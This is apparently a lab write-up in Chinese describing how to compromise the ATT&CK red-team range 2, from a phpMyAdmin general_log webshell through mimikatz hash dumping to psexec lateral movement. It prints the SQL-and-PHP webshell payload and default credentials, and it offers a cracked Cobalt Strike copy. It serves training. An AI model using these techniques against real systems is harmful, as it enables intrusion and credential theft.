我是小白——这很明显了
一,环境搭建
安服杯的环境是在ATT&CK红队评估实战靶场二的基础上搭建的,下面简单讲一下复现思路。
1网络配置
在ATT&CK红队评估实战靶场二的基础上,将WEB和PC的非域内的网卡设置为桥接模式,并将两台主机的网卡ipv4都设置为随机分配IP。
下面的DNS配置随意即可,设置为10.10.10.10也可以。
2补充内容
安装phpstudy和yxcms,php选用php5.5.9,phpmyadmn选用4.8版本,mysql选用5.6版本。
3复现的环境
需要请私信,比较大就不搞公开分享了,谢谢理解
二,渗透流程
这里简单提一下吧,CS这款工具不多说了吧,需要4.3英文破解版的可以私信我。
1边界突破
(1)数据库phpmyadmin漏洞写马
首先弱口令(root,root)进去
show variables like “%general%”
set global general_log=on;# 开启日志
set global general_log_file=‘C:/phpStudy/WWW/yxcms/hack.php’;# 设置日志位置为网站目录
select “<?php eval($_POST[apple]);?>”;
利用pl向数据库写马即可,然后蚁剑连接。
(2)任意文件写入
首先弱口令进入后台,admin,123456
在前台模板传马,并连接
2内网渗透
(1)域内信息收集
上线后与WEB靶机进行交互,查看域环境:
shell net time /domain
(上图为例子)
查看网络配置,发现WEB靶机配置有双网卡,存在内网环境
shell ipconfig
使用命令
net computers
查看网络环境中存活的机器,得到如下三个结果
(2)权限提升&HashDump
之后尝试导出NTLM Hash,首先使用MS15-051进行提权
(上图截取自大佬博客)
获得System权限的Beacon
使用minikatz成功导出Hash
3横向移动
在target处查看第二步中已发现的目标。
之后在WEB靶机上配置端口转发
并尝试进行横向移动,在CS的
View—>Target
下使用psexec模块尝试进行横向移动
注意配置好域名和Listener,点击运行后CS会执行一系列的活动,如使用mimikatz进行PTH操作,最终我们就能拿到PC靶机的Beacon
对于域控也是一样的,这里是在域控中设置了一个flag(安服杯是在每台主机里都设置了一个flag)
自此,三个靶机全部拿下。
链接: 大佬NB!
三,结束语
身为小白的我能为你带来一丝收获,那将是我的荣幸。